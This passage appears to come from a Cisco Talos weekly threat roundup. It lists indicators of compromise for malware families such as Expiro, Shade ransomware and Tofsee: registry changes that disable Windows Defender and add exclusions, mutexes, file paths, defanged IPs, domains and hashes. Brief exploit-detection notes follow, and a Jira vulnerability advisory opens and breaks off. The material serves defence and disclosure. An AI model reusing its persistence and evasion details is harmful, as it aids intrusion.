%TEMP%\XX--XX--XX.txt3
%TEMP%\UuU.uUu3
%TEMP%\XxX.xXx3
%APPDATA%\logs.dat3
%HOMEPATH%\Documents\MSDCSC2
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe2
%System32%\MSDCSC\msdcsc.exe1
%SystemRoot%\SysWOW64\MSDCSC1
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC1
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC\msdcsc.exe1
\dir1
\dir\install1
\dir\install\install1
\dir\install\install\server.exe1
%SystemRoot%\SysWOW64\install1
%SystemRoot%\SysWOW64\install\server.exe1
%SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe1
%HOMEPATH%1
%HOMEPATH%\Desktop1
%HOMEPATH%\Desktop\Yeni klasör1
%HOMEPATH%\Desktop\Yeni klasör\install1
%HOMEPATH%\Desktop\Yeni klasör\install\server.exe1
%TEMP%\YOUS2.DCP1
%TEMP%\SDQWEQ.EXE1
*See JSON for more IOCs

File Hashes

08c0ff2a95d50cd94b1f5f58b3af99091d27490f949c0d3c68dbc81dec5f9171 190b08b1337d404696b0c91f0442d31149080c97b7a6fe13cf879b1a4ead4c94 3f74c0ebf0701b6726ddb4fdc6ddb15610d0075691b02e9615c50e095359b6c2 4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72 54ade3e9aa6cc71cb769eb69a65110f5fa5cdac93cbf20b82609b996bfaf76ca 611d5155f8e505c20f5d1e2bb70b37b84d7de3458577d89cc32dc12f0351ec95 988e7312821405d692b5b5846be7ede45f0d8bd23c914385a737efa0400f2bad 9cb46d011f79a6db1c6baef5b9cae3020166a515dff284fcd6ea2fb51da1cf1d a5f9af2d94dd64d9c05e56d9560c386081823a69823d8609501f1506ab5d7a1a a919a95c83a233542e5da375487e6fabb1b81157c8f5bb372e12bebad910b170 e586a39a113c6c49b096ff19519e822f736d06c805a01eaed6adee2ab5a5836c f2ae8953fa9406d5f746ff92b94dfc1d0d09378f12372a71ef07c98f94167317

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Win.Virus.Expiro-7153559-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Type
18
MutexesOccurrences
gazavat-svc18
kkq-vx_mtx5218
kkq-vx_mtx5318
kkq-vx_mtx5418
kkq-vx_mtx5518
kkq-vx_mtx5618
kkq-vx_mtx5718
kkq-vx_mtx5818
kkq-vx_mtx5918
kkq-vx_mtx6018
kkq-vx_mtx6118
kkq-vx_mtx6218
kkq-vx_mtx6318
kkq-vx_mtx6418
kkq-vx_mtx6518
kkq-vx_mtx6618
kkq-vx_mtx6718
kkq-vx_mtx6818
kkq-vx_mtx6918
kkq-vx_mtx7018
kkq-vx_mtx7118
kkq-vx_mtx7218
kkq-vx_mtx7318
kkq-vx_mtx7418
kkq-vx_mtx7518
*See JSON for more IOCs
Files and or directories createdOccurrences
\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\ckjgpiji.tmp18
\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\klncjook.tmp18
\MSOCache\All Users\{91140000-0011-0000-0000-0000000FF1CE}-C\bglnccaf.tmp18
\MSOCache\All Users\{91140000-0011-0000-0000-0000000FF1CE}-C\mnclgkoo.tmp18
%CommonProgramFiles%\Microsoft Shared\MSInfo\kcndgmlj.tmp18
%CommonProgramFiles%\Microsoft Shared\OFFICE14\cgcganec.tmp18
%CommonProgramFiles%\Microsoft Shared\VSTO\10.0\pnpndocj.tmp18
%CommonProgramFiles%\Microsoft Shared\ink\bafefhom.tmp18
%CommonProgramFiles%\Microsoft Shared\ink\dnmejccm.tmp18
%CommonProgramFiles%\Microsoft Shared\ink\ejlkpjei.tmp18
%CommonProgramFiles%\Microsoft Shared\ink\fijffced.tmp18
%CommonProgramFiles%\Microsoft Shared\ink\ghpbhbif.tmp18
%CommonProgramFiles%\Microsoft Shared\ink\gkbpadmi.tmp18
%CommonProgramFiles%\Microsoft Shared\ink\pnhochhl.tmp18
%ProgramFiles%\DVD Maker\jaemdheq.tmp18
%ProgramFiles%\Internet Explorer\geakanpm.tmp18
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe18
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe18
%System32%\alg.exe18
%System32%\dllhost.exe18
%System32%\ieetwcollector.exe18
%System32%\msdtc.exe18
%System32%\msiexec.exe18
%System32%\snmptrap.exe18
%System32%\sppsvc.exe18
*See JSON for more IOCs

File Hashes

042fc31aadb0e0a33f91c9513ed9110d0c181de5b49f22614eb15ca759aabc58 07964288aebc5a85af04a534b2e795ded8c270466edfe2938cb5a7aae95fedee 2868317804d6a32158c492563f8cf121b0e714d116046f66323d49f7ea441f96 32084017ad00fe6e0ab45a804904363e3526f383cc78d35df55f66937b96f8fd 45414708db6a99c7fb927fcbc84861e55255a85e1583eaf661ef6226a880c525 53fd6b9b925d4cf2b143f057f11fa15659dd8d3e560aafa54148e87082e0aae7 69907401f98b32f51c11cd53b5149b29f8c4ecab38e08ca76188739f57e00431 6e3f1120e34aac4dea7bc87ce7a7185074841bc7077c2fa13a742f0ca53c81a3 6fa4177a1ee93669aa408db21de55d860d9792f6d544cf3510d4c121c95f5be0 749762f179e4c19d613a128150d3b82d1b0c138424ad3d436a77874a3392829e 79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006 91a4c230b121564208cbb629ddb79df79651738b2abd59c426b32e4dc4022f1d a24c20594273edfc118ccce5b7e82081240e9f6a3323818f7ac17d990170471d a52fdbfecc6455806e30f138c43f02186f91daf5fb032e62efd68e697322542f b2aac39e286f2172baa62b16555191a60d6c1d25d63f73de51d80d60f263db32 c367dd19b06798008ed520730d0c7e05f28645d4565de62969a318275b9e6cff de601aa4336e1ae644b7dcee10e0748cea30d70907b7e899ae39b364b56e181f e62cf47c56c9858faf8a344e9b468293b48069c0f1d47034fea06409e9c26644

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Ransomware.Shade-7158472-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xi
71
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Client Server Runtime Subsystem
71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xVersion
71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32 71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION 71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: shst
50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: sh1
50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xstate
50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xcnt
50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xmode
50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xpk
50
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
Value Name: ExceptionRecord
41
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: CleanShutdown
32
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{509D0DCA-5840-11E6-A51E-806E6F6E6963}
Value Name: Generation
32
<HKLM>\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&A27250A&0&2
Value Name: CustomPropertyHwIdKey
32
<HKLM>\SYSTEM\CONTROLSET001\ENUM\USB\VID_46F4&PID_0001\1-0000:00:1D.7-2
Value Name: CustomPropertyHwIdKey
32
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{509D0DCA-5840-11E6-A51E-806E6F6E6963}
Value Name: Data
32
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5}
Value Name: Data
31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5}
Value Name: Generation
31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: Data
31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: Generation
31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: Data
31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: Generation
31
<HKLM>\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_1AF4&DEV_1001&SUBSYS_00021AF4&REV_00\3&2411E6FE&2&18
Value Name: CustomPropertyHwIdKey
31
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: shsnt
31
MutexesOccurrences
cversions.2.m30
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
128[.]31[.]0[.]3928
193[.]23[.]244[.]24426
86[.]59[.]21[.]3825
131[.]188[.]40[.]18924
194[.]109[.]206[.]21223
154[.]35[.]32[.]522
171[.]25[.]193[.]922
76[.]73[.]17[.]19420
104[.]18[.]35[.]13120
208[.]83[.]223[.]3418
104[.]16[.]154[.]3616
104[.]16[.]155[.]3615
104[.]18[.]34[.]13111
51[.]68[.]204[.]1393
46[.]166[.]182[.]203
148[.]251[.]51[.]663
51[.]68[.]206[.]283
145[.]239[.]66[.]2362
78[.]129[.]150[.]722
144[.]76[.]57[.]1652
137[.]74[.]19[.]2022
37[.]157[.]254[.]1132
136[.]243[.]176[.]1482
69[.]30[.]219[.]822
62[.]210[.]157[.]1332
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
whatismyipaddress[.]com31
opengraphprotocol[.]org31
wsrs[.]net31
whatsmyip[.]net31
cmsgear[.]com31
luminati[.]io31
redirme[.]com31
Files and or directories createdOccurrences
%ProgramData%\Windows\csrss.exe71
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859862[[fn=Urban Pop]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859865[[fn=Kilter]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859866[[fn=Macro]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859868[[fn=Thermal]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01972873[[fn=Summer]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455519[[fn=Winter]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455596[[fn=Spring]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455610[[fn=Autumn]].thmx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793058[[fn=Median]].dotx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793064[[fn=Equity]].dotx50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx50
%APPDATA%\Microsoft\Templates\Normal.dotm50
%APPDATA%\Microsoft\UProof\CUSTOM.DIC50
%APPDATA%\Mozilla\Firefox\profiles.ini50
\README1.txt50
\README10.txt50
\README2.txt50
\README3.txt50
\README4.txt50
\README5.txt50
\README6.txt50
\README7.txt50
\README8.txt50
*See JSON for more IOCs

File Hashes

00591b03aa2be7dc7e67fa04a5da57bb803a2b4bc008fd7df40feadb72d2f00d 00953fe490792ae76ab5a584513a0ab3c460bcaa4fbb08f88ea5f0a261c44eab 018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6 01b2c4dd09be08a0db5cd266c2b0f4ae01ab920c6647910de820eb9cf82d55d4 01dea6848c96188f53d6e90977326b3562a2fcc30bd84c3d0e67880d6d4b8c50 02146af20bcaec9dbf6f30071791e73c7fd4eac6657f3b9d3159a6f663764250 025207f8e1551eb8156dd759426d57b2cbb42ce7b65479f071b7ffe8d0d03479 02b34490a5a4688b754dbb9be6507330ae88dfbc911f5c09e9e9e7c7ef10f2c5 02bf9968e18495581c271d4110a7bbaaf3889043c93af10357cb10499c8950a7 0616e6bc594dea95fad720bc966573921d9f2ec92eddcf665975227776e07fd6 0644b301b6414d2fe97644ae926849252c7a33607f2288253e9e53c5afd5c476 067cc19af3565e37da3bc0189210ad87ad111faf2a4c845f01fca036e3da912b 068491e6b7b02d7fef9a4778862886565795765b28b3c8f72f0d7adebc0b0a47 06a02b8b9e4871d0e558818a259dc6b6fcd0789b3d6a0f1c35dfaf90a8fc33f6 072a786d43860a9b5c2d4b49c1228ba651fad80e812eccd3e698d0f7b1b3adae 0769d0046146bd19aa118706ac9a470575139f06479c2781b680b5d8b92cce05 093bc279dcf1d7ee9a194af8e1e323b9ebe94f8a59a6dbbed8e82ca552c4dcb2 09483603bc66291e19444d644a5627416fb09d097b2a5efac0755c957cf7aedd 0c244b7cf8841885f0fecb184610c80ff3b3f6015e86f50ce35023383396dbf2 0c703b45991e6b99d4d4155af6437c5e255d7e52af06a2c9a29a3391774e4ae7 0d35cc4470e1f4493c8a9919769a9069a7deae2ee6ced8bd8ef0040c934a57f9 0d7531dc6587e8d9f9e3eae58e803b4aafd6d35927e7d48cc0a730cdc98a89d0 0df9f6f2d26051ba29c79a61f46e482d0cd61bb20a699cc7937e2f52f4d20fca 0e1f57431d814b1383b0202f10cdc0e929bd17d7788dc04e5d99b5f60761484e 0e21c68614126c9afae8a7747af154fdd254def83795bdb4033cb5a50de80026
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Win.Packed.Tofsee-7150793-1

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mftzygmb
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\lesyxfla
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]25018
69[.]55[.]5[.]25018
172[.]217[.]3[.]10018
46[.]4[.]52[.]10918
176[.]111[.]49[.]4318
85[.]25[.]119[.]2518
144[.]76[.]199[.]218
144[.]76[.]199[.]4318
43[.]231[.]4[.]718
192[.]0[.]47[.]5918
95[.]181[.]178[.]1718
173[.]194[.]207[.]2716
216[.]146[.]35[.]3515
213[.]205[.]33[.]6314
172[.]217[.]197[.]2614
208[.]76[.]51[.]5113
208[.]76[.]50[.]5013
148[.]163[.]156[.]112
64[.]233[.]186[.]2612
208[.]71[.]35[.]13711
172[.]217[.]5[.]22811
67[.]231[.]154[.]16211
209[.]85[.]203[.]2711
199[.]5[.]26[.]4610
199[.]5[.]157[.]13110
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa18
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org18
250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org18
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net18
whois[.]iana[.]org18
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net18
whois[.]arin[.]net18
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org18
microsoft-com[.]mail[.]protection[.]outlook[.]com18
honeypus[.]rusladies[.]cn18
marina99[.]ruladies[.]cn18
sexual-pattern3[.]com18
coolsex-finders5[.]com18
smtp[.]secureserver[.]net15
super-efectindating3[.]com13
ipinfo[.]io12
mx1[.]emailsrvr[.]com12
mx0a-001b2d01[.]pphosted[.]com12
mx-aol[.]mail[.]gm0[.]yahoodns[.]net11
etb-1[.]mail[.]tiscali[.]it10
mta5[.]am0[.]yahoodns[.]net9
mx-eu[.]mail[.]am0[.]yahoodns[.]net9
eur[.]olc[.]protection[.]outlook[.]com9
aol[.]com9
hotmail-com[.]olc[.]protection[.]outlook[.]com9
*See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile18
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>18
%TEMP%\<random, matching '[a-z]{8}'>.exe18
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)11
%SystemRoot%\SysWOW64\config\systemprofile:.repos3
%TEMP%\supvobl.exe1

File Hashes

1599aff065e6687acafc61a6f572652d1a0f7a0b17e3a71ca32fe848f2dc2732 1f8ca64991ba709a857f0dcd5bc5d6e9b0885ebc929989f03be3dfb58ecf9ce0 2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac 4368a7bb048f1ba83bbd8430b2f49cb566cd69642ed3e9de3675f69533125b29 471c51b4340ed0091aeaf0402f762230689951e448f703033ed4bd1f2fb7a7d6 5195a9a5a3094c3735668216461d2be638152ae0738dab4d8a9295b697bc567c 675f23d881b4685a171767073e01f889ddeb879af7036fde7bcf341f33699da5 8092a1a1db9009435d1177afdef7fb7334e090b8d1b2f5c3e4d121ac0c110cbb 8120184d0a6340d01c5226d28747a2da5c81ef323e126df5a92ff9ada41b5c42 86cf3a207714ea953fb6834643b68064b912c077d44c31b9ed287feab0bc0e4a 8baff9107ff5c48ed53d633fe18f039d3cdd30eedcf05e55b4c467f9f9aed831 9c8275a2d03edd430e8263980a2c31106ab7116e40b93bead7108c6ed97e29fc a3e921ece8ec6a501dbb88c78fea54e2bd15e46b22cb61abced99973c70cf6f8 c2606f0413239f1c60cccd260374e6b88694718af0389be6d173a5c466e7d819 c2a86711660f12b21a7f3fe3fde6b7f07faeb486111d71e34abc27f90f31b415 c94a846dc45a26b4d3869ac32de34aa780720d4cd21743847bb87a2da4a14a8b d7d152e0dc028976050dbace9078c99feddce0f805c1892b4f1ac92feaf5fe15 dae992cf09f4681239e858e69eebfff7e35786069d7719482ccbb15615ec7a7e

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (7002)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Madshi injection detected - (2740)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected - (1860)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Process hollowing detected - (1503)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Trickbot malware detected - (1131)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Gamarue malware detected - (205)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (128)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (95)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
PowerShell file-less infection detected - (89)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
Fusion adware detected - (41)
Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.

Vulnerability Spotlight: Multiple vulnerabilities in Atlassian Jira

$
0
0

Ben Taylor of Cisco ASIG discovered these vulnerabilities.

Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is a piece of software that allows users to create, manage and organize tasks and manage projects. These bugs could create a variety of scenarios, including the ability to execute code inside of Jira and the disclosure of information inside of tasks created in Jira, including attached documents.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlassian to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Atlassian Jira WikiRenderer parser XSS vulnerability (TALOS-2019-0833/CVE-2019-8444)

An exploitable XSS vulnerability exists in the WikiRenderer functionality of Atlassian Jira, from version 7.6.4 to 8.1.0. A specially crafted comment can cause a persistent XSS. An attacker can create a comment or worklog entry to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira CSRF login vulnerability (TALOS-2019-0834)

An exploitable CSRF vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. The login form doesn't require a CSRF token. As a result, an attacker can log a user into the system under an unexpected account.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira CSRF login vulnerability (TALOS-2019-0835/CVE-2019-14998)

